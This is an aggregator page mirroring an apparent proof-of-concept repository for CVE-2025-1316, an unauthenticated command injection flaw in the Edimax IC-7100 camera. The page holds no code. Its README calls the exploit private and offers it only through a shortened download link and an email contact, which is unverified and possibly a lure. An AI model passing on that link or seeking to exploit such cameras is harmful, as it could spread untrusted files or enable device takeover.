CVE-2025-1316 PoC — Edimax IC-7100 IP Camera OS Command Injection

Source

https://github.com/Rimasue/CVE-2025-1316

Associated Vulnerability

Title:Edimax IC-7100 IP Camera OS Command Injection (CVE-2025-1316)
Description:Edimax IC-7100 does not properly neutralize requests. An attacker can create specially crafted requests to achieve remote code execution on the device

Description

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78)

Readme

# CVE-2025-1316
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78)
## Overview
A critical vulnerability in the Edimax IC-7100 network camera where the device fails to properly neutralize incoming requests, enabling remote code execution through specially crafted requests.

## Details
+ **CVE ID**: CVE-2025-1316
+ **Published**:03/04/2025

+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.3
## Impact
An unauthenticated attacker can completely compromise the network camera, potentially: - Executing arbitrary remote code - Gaining full control of the camera - Accessing, modifying, or disabling camera systems - Potentially leveraging the device as an entry point into connected networks


## Affected Versions
Edimax IC-7100 network camera
## Contact
+ **For inquiries, please contact:LeronTavish@outlook.com**

 ## Exploit
+ **[Download here](https://tinyurl.com/bdfx97me)**

File Snapshot


 [4.0K]  /data/pocs/baf3ad97e91bfa58ca7875f28d7e4566654e91ea
└── [ 970]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!